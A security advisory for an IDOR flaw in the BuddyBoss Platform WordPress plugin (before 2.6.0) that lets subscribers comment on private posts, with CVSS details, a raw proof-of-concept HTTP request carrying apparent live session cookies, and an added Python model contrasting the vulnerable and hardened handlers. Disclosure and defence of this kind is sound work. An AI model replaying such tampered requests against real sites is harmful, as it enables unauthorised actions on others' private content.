Source: wpexploit
Author: Faris Krivic
WPEX-ID:76E8591F-120C-4CD7-B9A2-79F8D4D98AA8
History: May 15, 2024 - 12:00 a.m.

BuddyBoss Platform < 2.6.0 - Subscriber+ Comment on Private Post via IDOR

Tags: buddyboss platform, subscriber, private posts, idor vulnerability, proof of concept, may 29 2024, update

CVSS3: 4.3 Medium

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: LOW
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

AI Score: 6.6 Medium (Confidence: High)

EPSS: 0.0004 Low (Percentile: 14.1%)

Description

The plugin contains an IDOR vulnerability that allows a user to comment on a private post by manipulating the ID included in the request:

POST /wp-admin/admin-ajax.php HTTP/2
Host: online-communities.demos.buddyboss.com
Cookie: wordpress_sec_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7Cad6f4652de2481a56e68bdd28c294386fae37234e735065d6b90abd61ec052e9; _gcl_au=1.1.780899166.1702488357; _ga_YJ9BETCSZM=GS1.1.1702488357.1.1.1702489668.60.0.0; _ga=GA1.2.700400885.1702488358; _pin_unauth=dWlkPU1qWmpOVGhsTVRBdE16QmtNUzAwWVRJd0xXRmhaV1V0TURWaE1XUm1aall5WTJFeQ; _gid=GA1.2.1652937291.1702488358; psuid=9ba8f98a-a8df-4e85-be53-540ffc862ed1; ps5b7449d2840fc1452412f2fe=true|1700697600000; _fbp=fb.1.1702488359281.1942424250; ab-sandbox_019a643733c4caf6b40a23bdf343c136=66566579e92883ee8%7C256035; tk_ai=woo%3AYqcaaRyMBwKX1aMgKwlMVWzS; redux_current_tab=undefined; redux_current_tab_get=undefined; redux_current_tab_buddyboss_theme_options=undefined; tk_qs=; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=5e5b26d2ede9d2856d58613b04cbbc5c; wordpress_logged_in_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7C6dc658c846e2a136591d87ec20e80fe6176895bdbbbafc955959dcb2f9b35889; _gat_UA-235369-35=1; _uetsid=ae00a78099dc11eeb8b089e40d4468de; _uetvid=ae008bf099dc11ee8decf552a53d469a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://online-communities.demos.buddyboss.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 195
Origin: https://online-communities.demos.buddyboss.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

scope=all&nonce=2081885524&action=new_activity_comment&_wpnonce_new_activity_comment=bc95aefd23&comment_id=194628&form_id=194628&content=%3Cp%3ETHIS+SHOULD+NOT+HAPPEN%3Cbr%3E%3C%2Fp%3E&modbypass=

The vulnerability was identified in the comment_id and form_id parameters, which allowed a private post to be commented on as another user.
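The missing object-level authorization check, shown as an added Python model that is not part of the original advisory and is not BuddyBoss code: the handler that trusts the submitted IDs sits beside one that checks both comment_id and form_id against the session user before writing. The parameter names, the action name, the ID 194628 and the user adele come from the request above; the activity store, its privacy values, the owner john and all function names are assumptions made for illustration.

```python
from urllib.parse import parse_qs

# Constructed store: activity id -> owner and privacy (not BuddyBoss's schema).
ACTIVITIES = {
    194628: {"owner": "john", "privacy": "onlyme"},
    194700: {"owner": "john", "privacy": "public"},
}
COMMENTS = []  # (activity_id, author, content) tuples accepted so far

def can_read(user, activity):
    """Deny by default: only public items or the owner's own items are readable."""
    return activity["privacy"] == "public" or activity["owner"] == user

def target_ids(form):
    """Return comment_id and form_id as a set of ints, or None if missing/malformed."""
    try:
        return {int(form[key][0]) for key in ("comment_id", "form_id")}
    except (KeyError, ValueError):
        return None

def comment_vulnerable(user, body):
    """Trusts the client-supplied ids: the behaviour the advisory describes."""
    form = parse_qs(body, keep_blank_values=True)
    ids = target_ids(form)
    if ids is None:
        return 400
    COMMENTS.append((int(form["form_id"][0]), user, form.get("content", [""])[0]))
    return 200

def comment_hardened(user, body):
    """Checks every referenced object against the session user before writing."""
    form = parse_qs(body, keep_blank_values=True)
    ids = target_ids(form)
    if ids is None or "content" not in form:
        return 400
    for activity_id in ids:
        activity = ACTIVITIES.get(activity_id)
        # Same status for 'missing' and 'forbidden' avoids confirming that an id exists.
        if activity is None or not can_read(user, activity):
            return 403
    COMMENTS.append((int(form["form_id"][0]), user, form["content"][0]))
    return 200

# Constructed body using the parameter names from the request above (nonces omitted).
BODY = "action=new_activity_comment&comment_id=194628&form_id=194628&content=%3Cp%3Etest%3C%2Fp%3E"
```

A valid nonce does not substitute for this check: it only proves the request came from the user's own session, not that the user may act on the referenced object.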
